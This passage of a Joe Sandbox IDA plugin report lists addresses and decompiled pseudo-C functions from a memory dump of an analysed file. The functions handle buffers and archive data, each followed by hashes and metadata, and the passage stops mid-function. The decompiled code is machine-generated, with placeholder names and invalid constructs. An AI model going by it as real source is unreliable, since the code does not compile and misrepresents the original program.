0x00e61aa9
0x00e61aa9
0x00e61aac
0x00e61aae
0x00e61ab1
0x00000000
0x00000000
0x00e61ab7
0x00e61abc
0x00e61abe
0x00e61afa
0x00e61afa
0x00000000
0x00e61afa
0x00e61ac0
0x00e61ac3
0x00e61ac9
0x00e61acc
0x00e61b04
0x00e61b06
0x00e61b0c
0x00e61b12
0x00e61b18
0x00e61b20
0x00e61b22
0x00e61b28
0x00e61b2b
0x00e61b32
0x00e61b37
0x00e61b3c
0x00e61b44
0x00000000
0x00e61b44
0x00e61b2d
0x00e61b30
0x00000000
0x00000000
0x00000000
0x00e61b30
0x00e61ace
0x00e61ad0
0x00000000
0x00000000
0x00e61ad2
0x00e61ad5
0x00000000
0x00000000
0x00e61ad7
0x00e61adb
0x00000000
0x00000000
0x00e61ae0
0x00e61ae2
0x00e61ae6
0x00000000
0x00000000
0x00e61ae8
0x00e61aec
0x00000000
0x00000000
0x00e61aee
0x00e61af2
0x00000000
0x00000000
0x00e61af4
0x00e61af8
0x00000000
0x00000000
0x00000000
0x00e61afd
0x00e61afd
0x00e61afe
0x00e61afe
0x00000000
0x00e61b02
0x00e61a20
0x00e61a26
0x00e61a29
0x00e61a2f
0x00e61a32
0x00e61a37
0x00e61a3f
0x00e61a47
0x00e61a4c
0x00e61a54
0x00e61a54
0x00000000
0x00e61a29
0x00e61a05
0x00e61a05
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00E619CB

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 7e1ed40ba517df128be6a128083b86f588602592c29b5108d9b09e230e877f82
Instruction ID: 7cbf518b174bd0d9babaf25120a853dc57b531a96ef993f4c996293089fe4a44
Opcode Fuzzy Hash: 7e1ed40ba517df128be6a128083b86f588602592c29b5108d9b09e230e877f82
Instruction Fuzzy Hash: 5EC1B230A442849FDF16CF68D484BAD7BE1AF15388F1C64FADC46BB286CB319944CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00E63AC2 Relevance: 1.7, APIs: 1, Instructions: 176
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00E63AC2(void* __ecx, signed int __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t76;
				signed int _t83;
				intOrPtr _t94;
				void* _t120;
				char _t121;
				void* _t123;
				void* _t130;
				signed int _t144;
				signed int _t148;
				void* _t151;
				void* _t153;

				_t143 = __edx;
				_t123 = __ecx;
				E00E7E554(E00E91FF0, _t153);
				E00E7E630();
				_t151 = _t123;
				_t156 =  *((char*)(_t151 + 0x6cc4));
				if( *((char*)(_t151 + 0x6cc4)) == 0) {
					__eflags =  *((char*)(_t151 + 0x45f0)) - 5;
					if(__eflags > 0) {
						L26:
						E00E66D41(__eflags, 0x1e, _t151 + 0x24);
						goto L27;
					}
					__eflags =  *((intOrPtr*)(_t151 + 0x6cb0)) - 3;
					__eflags =  *((intOrPtr*)(_t151 + 0x45ec)) - ((0 |  *((intOrPtr*)(_t151 + 0x6cb0)) != 0x00000003) - 0x00000001 & 0x00000015) + 0x1d;
					if(__eflags > 0) {
						goto L26;
					}
					_t83 =  *(_t151 + 0x5628) |  *(_t151 + 0x562c);
					__eflags = _t83;
					if(_t83 != 0) {
						L7:
						_t120 = _t151 + 0x20e8;
						E00E6CB2A(_t83, _t120);
						_push(_t120);
						E00E71B92(_t153 - 0xe6ec, __eflags); // executed
						_t121 = 0;
						_push(0);
						 *((intOrPtr*)(_t153 - 4)) = 0;
						E00E72E9E(0, _t153 - 0xe6ec, _t153,  *((intOrPtr*)(_t151 + 0x56c4)));
						_t148 =  *(_t153 + 8);
						__eflags =  *(_t153 + 0xc);
						if( *(_t153 + 0xc) != 0) {
							L15:
							__eflags =  *((intOrPtr*)(_t151 + 0x566b)) - _t121;
							if( *((intOrPtr*)(_t151 + 0x566b)) == _t121) {
								L18:
								E00E6AC78(_t151 + 0x21a0, _t143,  *((intOrPtr*)(_t151 + 0x5640)), 1);
								 *(_t151 + 0x2108) =  *(_t151 + 0x5628);
								 *(_t151 + 0x210c) =  *(_t151 + 0x562c);
								 *((char*)(_t151 + 0x2110)) = _t121;
								E00E6CBDD(_t151 + 0x20e8, _t151,  *(_t153 + 0xc));
								_t130 = _t151 + 0x20e8;
								 *((char*)(_t151 + 0x2111)) =  *((intOrPtr*)(_t153 + 0x10));
								 *((char*)(_t151 + 0x2137)) =  *((intOrPtr*)(_t151 + 0x5669));
								 *((intOrPtr*)(_t130 + 0x38)) = _t151 + 0x45d0;
								 *((intOrPtr*)(_t130 + 0x3c)) = _t121;
								_t94 =  *((intOrPtr*)(_t151 + 0x5630));
								_t144 =  *(_t151 + 0x5634);
								 *((intOrPtr*)(_t153 - 0x9aa4)) = _t94;
								 *(_t153 - 0x9aa0) = _t144;
								 *((char*)(_t153 - 0x9a8c)) = _t121;
								__eflags =  *((intOrPtr*)(_t151 + 0x45f0)) - _t121;
								if(__eflags != 0) {
									E00E72B4D(_t153 - 0xe6ec,  *((intOrPtr*)(_t151 + 0x45ec)), _t121);
								} else {
									_push(_t144);
									_push(_t94);
									_push(_t130); // executed
									E00E69477(_t121, _t144, _t148, __eflags); // executed
								}
								asm("sbb edx, edx");
								_t143 =  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b;
								__eflags = E00E6AC46(_t151 + 0x21a0, _t148, _t151 + 0x5640,  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b);
								if(__eflags != 0) {
									_t121 = 1;
								} else {
									E00E66D72(__eflags, 0x1f, _t151 + 0x24, _t151 + 0x45f8);
									E00E66FBA(0xea0f50, 3);
									__eflags = _t148;
									if(_t148 != 0) {
										E00E63DD8(_t148);
									}
								}
								L25:
								E00E71DEF(_t153 - 0xe6ec, _t143, _t148, _t151);
								_t76 = _t121;
								goto L28;
							}
							_t143 =  *(_t151 + 0x21bc);
							__eflags =  *((intOrPtr*)(_t143 + 0x5124)) - _t121;
							if( *((intOrPtr*)(_t143 + 0x5124)) == _t121) {
								goto L25;
							}
							asm("sbb ecx, ecx");
							_t138 =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
							__eflags =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
							E00E6CB95(_t151 + 0x20e8, _t121,  *((intOrPtr*)(_t151 + 0x566c)), _t143 + 0x5024, _t138, _t151 + 0x5681,  *((intOrPtr*)(_t151 + 0x56bc)), _t151 + 0x569b, _t151 + 0x5692);
							goto L18;
						}
						__eflags =  *(_t151 + 0x5634);
						if(__eflags < 0) {
							L12:
							__eflags = _t148;
							if(_t148 != 0) {
								E00E61FB9(_t148,  *((intOrPtr*)(_t151 + 0x5630)));
								E00E6CBFA(_t151 + 0x20e8,  *_t148,  *((intOrPtr*)(_t151 + 0x5630)));
							} else {
								 *((char*)(_t151 + 0x2111)) = 1;
							}
							goto L15;
						}
						if(__eflags > 0) {
							L11:
							E00E66D41(__eflags, 0x1e, _t151 + 0x24);
							goto L25;
						}
						__eflags =  *((intOrPtr*)(_t151 + 0x5630)) - 0x1000000;
						if(__eflags <= 0) {
							goto L12;
						}
						goto L11;
					}
					__eflags =  *((intOrPtr*)(_t151 + 0x5669)) - _t83;
					if( *((intOrPtr*)(_t151 + 0x5669)) != _t83) {
						goto L7;
					} else {
						_t76 = 1;
						goto L28;
					}
				} else {
					E00E66D41(_t156, 0x1d, _t151 + 0x24);
					E00E66FBA(0xea0f50, 3);
					L27:
					_t76 = 0;
					L28:
					 *[fs:0x0] =  *((intOrPtr*)(_t153 - 0xc));
					return _t76;
				}
			}

0x00e63ac2
0x00e63ac2
0x00e63ac7
0x00e63ad1
0x00e63ad7
0x00e63ad9
0x00e63ae0
0x00e63afe
0x00e63b05
0x00e63d47
0x00e63d4d
0x00000000
0x00e63d4d
0x00e63b0d
0x00e63b1e
0x00e63b24
0x00000000
0x00000000
0x00e63b30
0x00e63b30
0x00e63b36
0x00e63b47
0x00e63b48
0x00e63b51
0x00e63b56
0x00e63b5d
0x00e63b62
0x00e63b6a
0x00e63b71
0x00e63b74
0x00e63b79
0x00e63b7c
0x00e63b7f
0x00e63bd4
0x00e63bd4
0x00e63bda
0x00e63c36
0x00e63c44
0x00e63c58
0x00e63c65
0x00e63c6b
0x00e63c71
0x00e63c79
0x00e63c7f
0x00e63c8b
0x00e63c97
0x00e63c9a
0x00e63c9d
0x00e63ca3
0x00e63ca9
0x00e63caf
0x00e63cb5
0x00e63cbb
0x00e63cc1
0x00e63cda
0x00e63cc3
0x00e63cc3
0x00e63cc4
0x00e63cc5
0x00e63cc6
0x00e63cc6
0x00e63cf4
0x00e63cf6
0x00e63d05
0x00e63d07
0x00e63d34
0x00e63d09
0x00e63d16
0x00e63d22
0x00e63d27
0x00e63d29
0x00e63d2d
0x00e63d2d
0x00e63d29
0x00e63d36
0x00e63d3c
0x00e63d42
0x00000000
0x00e63d44
0x00e63bdc
0x00e63be2
0x00e63be8
0x00000000
0x00000000
0x00e63c11
0x00e63c1a
0x00e63c1a
0x00e63c31
0x00000000
0x00e63c31
0x00e63b81
0x00e63b87
0x00e63ba7
0x00e63ba7
0x00e63ba9
0x00e63bbc
0x00e63bcf
0x00e63bab
0x00e63bab
0x00e63bab
0x00000000
0x00e63ba9
0x00e63b89
0x00e63b97
0x00e63b9d
0x00000000
0x00e63b9d
0x00e63b8b
0x00e63b95
0x00000000
0x00000000
0x00000000
0x00e63b95
0x00e63b38
0x00e63b3e
0x00000000
0x00e63b40
0x00e63b40
0x00000000
0x00e63b40
0x00e63ae2
0x00e63ae8
0x00e63af4
0x00e63d52
0x00e63d52
0x00e63d54
0x00e63d58
0x00e63d62
0x00e63d62

APIs

__EH_prolog.LIBCMT ref: 00E63AC7

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 928369d0941d9e2ee99aae79cf78b35745d1c2aa27c1dd601b5d7753996b0d1a
Instruction ID: 4eff796e993bac0da866e451e64f193a2ce3f1246ab104558e0ceb49b4f27989
Opcode Fuzzy Hash: 928369d0941d9e2ee99aae79cf78b35745d1c2aa27c1dd601b5d7753996b0d1a
Instruction Fuzzy Hash: CE710071144F84AEDB21DB30DC81AEBF7E8AF15341F44696EE1AB67242DB316A48CF11

Uniqueness

Uniqueness Score: -1.00%

Function 00E6850D Relevance: 1.6, APIs: 1, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00E6850D(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t47;
				signed int _t50;
				signed int _t51;
				void* _t53;
				signed int _t55;
				signed int _t61;
				intOrPtr _t73;
				signed int _t80;
				void* _t88;
				void* _t89;
				void* _t91;
				intOrPtr _t93;
				void* _t95;
				void* _t98;

				_t98 = __eflags;
				_t90 = __edi;
				_t88 = __edx;
				_t73 = __ecx;
				E00E7E554(E00E92104, _t95);
				E00E7E630();
				_t93 = _t73;
				_t1 = _t95 - 0x9d58; // -38232
				E00E613A2(_t1, _t88, __edi, _t98,  *(_t93 + 8));
				 *(_t95 - 4) =  *(_t95 - 4) & 0x00000000;
				_t6 = _t95 - 0x9d58; // -38232
				if(E00E6A097(_t6, __edi, _t93, _t93 + 0xf6) != 0) {
					_t7 = _t95 - 0x9d58; // -38232, executed
					_t47 = E00E619C6(_t7, _t88, 1); // executed
					if(_t47 != 0) {
						__eflags =  *((char*)(_t95 - 0x3093));
						if( *((char*)(_t95 - 0x3093)) == 0) {
							_push(__edi);
							_t91 = 0;
							__eflags =  *(_t95 - 0x30a3);
							if( *(_t95 - 0x30a3) != 0) {
								_t10 = _t95 - 0x9d34; // -38196
								_t11 = _t95 - 0x1010; // -2064
								_t61 = E00E70131(_t11, _t10, 0x800);
								__eflags =  *(_t95 - 0x309e);
								while(1) {
									_t17 = _t95 - 0x1010; // -2064
									E00E6BCC8(_t17, 0x800, (_t61 & 0xffffff00 | __eflags == 0x00000000) & 0x000000ff);
									_t18 = _t95 - 0x2058; // -6232
									E00E67119(_t18);
									_push(0);
									_t19 = _t95 - 0x2058; // -6232
									_t20 = _t95 - 0x1010; // -2064
									_t61 = E00E6A6B9(_t18, _t88, __eflags, _t20, _t19);
									__eflags = _t61;
									if(_t61 == 0) {
										break;
									}
									_t91 = _t91 +  *((intOrPtr*)(_t95 - 0x1058));
									asm("adc ebx, [ebp-0x1054]");
									__eflags =  *(_t95 - 0x309e);
								}
								 *((intOrPtr*)(_t93 + 0x98)) =  *((intOrPtr*)(_t93 + 0x98)) + _t91;
								asm("adc [esi+0x9c], ebx");
							}
							_t23 = _t95 - 0x9d58; // -38232
							E00E686A5(_t93, _t88, _t23);
							_t50 =  *(_t93 + 8);
							_t89 = 0x49;
							_pop(_t90);
							_t80 =  *(_t50 + 0x82fa) & 0x0000ffff;
							__eflags = _t80 - 0x54;
							if(_t80 == 0x54) {
								L11:
								 *((char*)(_t50 + 0x6201)) = 1;
							} else {
								__eflags = _t80 - _t89;
								if(_t80 == _t89) {
									goto L11;
								}
							}
							_t51 =  *(_t93 + 8);
							__eflags =  *((intOrPtr*)(_t51 + 0x82fa)) - _t89;
							if( *((intOrPtr*)(_t51 + 0x82fa)) != _t89) {
								__eflags =  *((char*)(_t51 + 0x6201));
								_t32 =  *((char*)(_t51 + 0x6201)) == 0;
								__eflags =  *((char*)(_t51 + 0x6201)) == 0;
								E00E71671((_t51 & 0xffffff00 | _t32) & 0x000000ff, (_t51 & 0xffffff00 | _t32) & 0x000000ff, _t93 + 0xf6);
							}
							_t33 = _t95 - 0x9d58; // -38232
							E00E61F20(_t33, _t89);
							do {
								_t34 = _t95 - 0x9d58; // -38232
								_t53 = E00E63A31(_t34, _t89, _t93);
								_t35 = _t95 - 0xd; // 0x7f3
								_t36 = _t95 - 0x9d58; // -38232
								_t55 = E00E68709(_t93, _t36, _t53, _t35); // executed
								__eflags = _t55;
							} while (_t55 != 0);
						}
					} else {
						E00E66FBA(0xea0f50, 1);
					}
				}
				_t37 = _t95 - 0x9d58; // -38232, executed
				E00E61653(_t37, _t90, _t93); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t95 - 0xc));
				return 0;
			}

0x00e6850d
0x00e6850d
0x00e6850d
0x00e6850d
0x00e68512
0x00e6851c
0x00e68522
0x00e68524
0x00e6852d
0x00e68532
0x00e6853d
0x00e6854a
0x00e68552
0x00e68558
0x00e6855f
0x00e68572
0x00e68579
0x00e68580
0x00e68583
0x00e68585
0x00e6858b
0x00e68592
0x00e68599
0x00e685a0
0x00e685a5
0x00e685c0
0x00e685cc
0x00e685d3
0x00e685d8
0x00e685de
0x00e685e3
0x00e685e5
0x00e685ec
0x00e685f3
0x00e685f8
0x00e685fa
0x00000000
0x00000000
0x00e685ad
0x00e685b3
0x00e685b9
0x00e685b9
0x00e685fc
0x00e68602
0x00e68602
0x00e68608
0x00e68611
0x00e68616
0x00e6861b
0x00e6861c
0x00e6861d
0x00e68625
0x00e68628
0x00e6862f
0x00e6862f
0x00e6862a
0x00e6862a
0x00e6862d
0x00000000
0x00000000
0x00e6862d
0x00e68636
0x00e68639
0x00e68640
0x00e68642
0x00e68650
0x00e68650
0x00e68657
0x00e68657
0x00e6865c
0x00e68662
0x00e68667
0x00e68667
0x00e6866d
0x00e68672
0x00e68677
0x00e68680
0x00e68685
0x00e68685
0x00e68667
0x00e68561
0x00e68568
0x00e68568
0x00e6855f
0x00e68689
0x00e6868f
0x00e6869a
0x00e686a4

APIs

__EH_prolog.LIBCMT ref: 00E68512

Part of subcall function 00E613A2: __EH_prolog.LIBCMT ref: 00E613A7
Part of subcall function 00E613A2: new.LIBCMT ref: 00E61420

Part of subcall function 00E619C6: __EH_prolog.LIBCMT ref: 00E619CB

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 4c739fed27d0f2bfd3d32db0986d5e1830e01bc184822105ab50843cf776a905
Instruction ID: 1abc345d31f0ae656fcf5aef7ac71eff7abe00abac8080efe0569618a8823c04
Opcode Fuzzy Hash: 4c739fed27d0f2bfd3d32db0986d5e1830e01bc184822105ab50843cf776a905
Instruction Fuzzy Hash: AE41B2719802549EDB20EB60D955BEEB3B8AF50348F0451EAE44EB3053DF745AC8DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00E730C9 Relevance: 1.6, APIs: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00E730C9(void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				void* _t29;
				signed int _t30;
				signed int* _t36;
				signed int _t38;
				intOrPtr _t39;
				intOrPtr _t42;
				signed int _t44;
				void* _t47;
				void* _t48;
				void* _t56;
				void* _t60;
				signed int _t65;
				void* _t67;
				void* _t69;
				void* _t73;

				_t56 = __edx;
				_t48 = __ecx;
				_t29 = E00E7E554(E00E9229E, _t67);
				_push(_t48);
				_push(_t48);
				_t60 = _t48;
				_t44 = 0;
				_t72 =  *((intOrPtr*)(_t60 + 0x20));
				if( *((intOrPtr*)(_t60 + 0x20)) == 0) {
					_push(0x400400); // executed
					_t42 = E00E7E7F3(_t48, _t56, 0x400400, _t72); // executed
					 *((intOrPtr*)(_t60 + 0x20)) = _t42;
					_t29 = E00E7F5F0(_t60, _t42, 0, 0x400400);
					_t69 = _t69 + 0x10;
				}
				_t73 =  *(_t60 + 0x18) - _t44;
				if(_t73 == 0) {
					_t65 =  *((intOrPtr*)(_t60 + 0x1c)) +  *((intOrPtr*)(_t60 + 0x1c));
					_t30 = _t65;
					 *(_t67 - 0x10) = _t65;
					_t58 = _t30 * 0x4ae4 >> 0x20;
					_push( ~(0 | _t73 > 0x00000000) | ( ~(_t73 > 0) | _t30 * 0x00004ae4) + 0x00000004);
					_t36 = E00E7E7F3(( ~(_t73 > 0) | _t30 * 0x00004ae4) + 4, _t30 * 0x4ae4 >> 0x20, _t65, _t73);
					_pop(0xea0f50);
					 *(_t67 - 0x14) = _t36;
					 *(_t67 - 4) = _t44;
					_t74 = _t36;
					if(_t36 != 0) {
						_push(E00E71EB0);
						_push(E00E71CD0);
						_push(_t65);
						_t16 =  &(_t36[1]); // 0x4
						_t44 = _t16;
						 *_t36 = _t65;
						_push(0x4ae4);
						_push(_t44);
						E00E7E65D(_t58, _t74);
					}
					 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
					 *(_t60 + 0x18) = _t44;
					_t29 = E00E7F5F0(_t60, _t44, 0, _t65 * 0x4ae4);
					if(_t65 != 0) {
						_t38 = 0;
						 *(_t67 - 0x10) = 0;
						do {
							_t47 =  *(_t60 + 0x18) + _t38;
							if( *((intOrPtr*)(_t47 + 0x4ad4)) == 0) {
								 *((intOrPtr*)(_t47 + 0x4adc)) = 0x4100;
								_t39 = E00E838A3(0xea0f50); // executed
								 *((intOrPtr*)(_t47 + 0x4ad4)) = _t39;
								0xea0f50 = 0x30c00;
								if(_t39 == 0) {
									E00E66EDC(0xea0f50);
								}
								_t38 =  *(_t67 - 0x10);
							}
							_t38 = _t38 + 0x4ae4;
							 *(_t67 - 0x10) = _t38;
							_t65 = _t65 - 1;
						} while (_t65 != 0);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t67 - 0xc));
				return _t29;
			}

0x00e730c9
0x00e730c9
0x00e730ce
0x00e730d3
0x00e730d4
0x00e730d8
0x00e730da
0x00e730dc
0x00e730df
0x00e730e6
0x00e730e7
0x00e730ef
0x00e730f2
0x00e730f7
0x00e730f7
0x00e730fa
0x00e730fd
0x00e73108
0x00e7310f
0x00e73111
0x00e73114
0x00e73129
0x00e7312a
0x00e7312f
0x00e73130
0x00e73133
0x00e73136
0x00e73138
0x00e7313a
0x00e7313f
0x00e73144
0x00e73145
0x00e73145
0x00e73148
0x00e7314a
0x00e7314f
0x00e73150
0x00e73150
0x00e73155
0x00e7315f
0x00e73166
0x00e73170
0x00e73172
0x00e73174
0x00e73177
0x00e7317a
0x00e73183
0x00e7318a
0x00e73194
0x00e73199
0x00e7319f
0x00e731a2
0x00e731a9
0x00e731a9
0x00e731ae
0x00e731ae
0x00e731b1
0x00e731b6
0x00e731b9
0x00e731b9
0x00e73177
0x00e73170
0x00e731c4
0x00e731ce

APIs

__EH_prolog.LIBCMT ref: 00E730CE

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: dc5452da6b48f06e3754caaf302aa535a4c40ec9f2a9860f649cd1e8c662cefe
Instruction ID: 9ee2ff56292d57845decd4bd4a11552631d7970eaea08c3579dfb932d88cc796
Opcode Fuzzy Hash: dc5452da6b48f06e3754caaf302aa535a4c40ec9f2a9860f649cd1e8c662cefe
Instruction Fuzzy Hash: 852106B1E412116FDB149F78DC4166B77A8EB09314F04917AE90DBB681D7709E00C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00E61E20 Relevance: 1.6, APIs: 1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00E61E20(intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t34;
				intOrPtr _t41;
				intOrPtr _t51;
				void* _t62;
				unsigned int _t64;
				signed int _t66;
				intOrPtr* _t68;
				void* _t70;

				_t62 = __edx;
				_t51 = __ecx;
				E00E7E554(E00E91FA5, _t70);
				_t49 = 0;
				 *((intOrPtr*)(_t70 - 0x10)) = _t51;
				 *((intOrPtr*)(_t70 - 0x24)) = 0;
				 *(_t70 - 0x20) = 0;
				 *((intOrPtr*)(_t70 - 0x1c)) = 0;
				 *((intOrPtr*)(_t70 - 0x18)) = 0;
				 *((char*)(_t70 - 0x14)) = 0;
				 *((intOrPtr*)(_t70 - 4)) = 0;
				_t34 = E00E63AC2(_t51, _t62, _t70 - 0x24, 0, 0); // executed
				if(_t34 != 0) {
					_t64 =  *(_t70 - 0x20);
					E00E616F2(_t70 - 0x24, _t62, 1);
					_t68 =  *((intOrPtr*)(_t70 + 8));
					 *((char*)( *(_t70 - 0x20) +  *((intOrPtr*)(_t70 - 0x24)) - 1)) = 0;
					_t16 = _t64 + 1; // 0x1
					E00E61869(_t68, _t16);
					_t41 =  *((intOrPtr*)(_t70 - 0x10));
					if( *((intOrPtr*)(_t41 + 0x6cb0)) != 3) {
						if(( *(_t41 + 0x45f4) & 0x00000001) == 0) {
							E00E71692( *((intOrPtr*)(_t70 - 0x24)),  *_t68,  *((intOrPtr*)(_t68 + 4)));
						} else {
							_t66 = _t64 >> 1;
							E00E7170D( *((intOrPtr*)(_t70 - 0x24)),  *_t68, _t66);
							 *((short*)( *_t68 + _t66 * 2)) = 0;
						}
					} else {
						_push( *((intOrPtr*)(_t68 + 4)));
						_push( *_t68);
						_push( *((intOrPtr*)(_t70 - 0x24)));
						E00E71748();
					}
					E00E61869(_t68, E00E83883( *_t68));
					_t49 = 1;
				}
				E00E615C2(_t70 - 0x24);
				 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
				return _t49;
			}

0x00e61e20
0x00e61e20
0x00e61e25
0x00e61e2e
0x00e61e32
0x00e61e35
0x00e61e38
0x00e61e3b
0x00e61e3e
0x00e61e41
0x00e61e49
0x00e61e4f
0x00e61e56
0x00e61e5e
0x00e61e66
0x00e61e71
0x00e61e74
0x00e61e78
0x00e61e7e
0x00e61e83
0x00e61e8d
0x00e61ea5
0x00e61ec6
0x00e61ea7
0x00e61ea7
0x00e61eaf
0x00e61eb8
0x00e61eb8
0x00e61e8f
0x00e61e8f
0x00e61e92
0x00e61e94
0x00e61e97
0x00e61e97
0x00e61ed6
0x00e61edc
0x00e61ede
0x00e61ee2
0x00e61eed
0x00e61ef7

APIs

__EH_prolog.LIBCMT ref: 00E61E25

Part of subcall function 00E63AC2: __EH_prolog.LIBCMT ref: 00E63AC7

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 5de0fe20abebb2d1ae2c2c9ff00994d8f350e6ae8c593f72e42cd353a95de0ee
Instruction ID: 951e75c4751db46e62a95eb19df9b3fe0a56b231ebf280fd240a821cac375927
Opcode Fuzzy Hash: 5de0fe20abebb2d1ae2c2c9ff00994d8f350e6ae8c593f72e42cd353a95de0ee
Instruction Fuzzy Hash: D5214B31A402089FCB16DFA9E9519EEFBF6BF48340B1454AEE849B3251DB325E10CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00E7AA53 Relevance: 1.6, APIs: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00E7AA53(void* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* __esi;
				short _t33;
				char _t36;
				short _t38;
				void* _t47;
				short _t55;
				void* _t57;
				void* _t58;
				short _t60;
				void* _t62;
				intOrPtr _t64;
				void* _t67;

				_t67 = __eflags;
				_t57 = __edx;
				_t47 = __ecx;
				E00E7E554(E00E922F9, _t62);
				_push(_t47);
				E00E7E630();
				_push(_t60);
				_push(_t58);
				 *((intOrPtr*)(_t62 - 0x10)) = _t64;
				 *((intOrPtr*)(_t62 - 4)) = 0;
				E00E613A2(_t62 - 0x7d24, _t57, _t58, _t67, 0); // executed
				 *((char*)(_t62 - 4)) = 1;
				E00E61F6F(_t62 - 0x7d24, _t57, _t60, _t62, _t67,  *((intOrPtr*)(_t62 + 0xc)));
				if( *((intOrPtr*)(_t62 - 0x105f)) == 0) {
					 *((intOrPtr*)(_t62 - 0x24)) = 0;
					 *((intOrPtr*)(_t62 - 0x20)) = 0;
					 *((intOrPtr*)(_t62 - 0x1c)) = 0;
					 *((intOrPtr*)(_t62 - 0x18)) = 0;
					 *((char*)(_t62 - 0x14)) = 0;
					 *((char*)(_t62 - 4)) = 2;
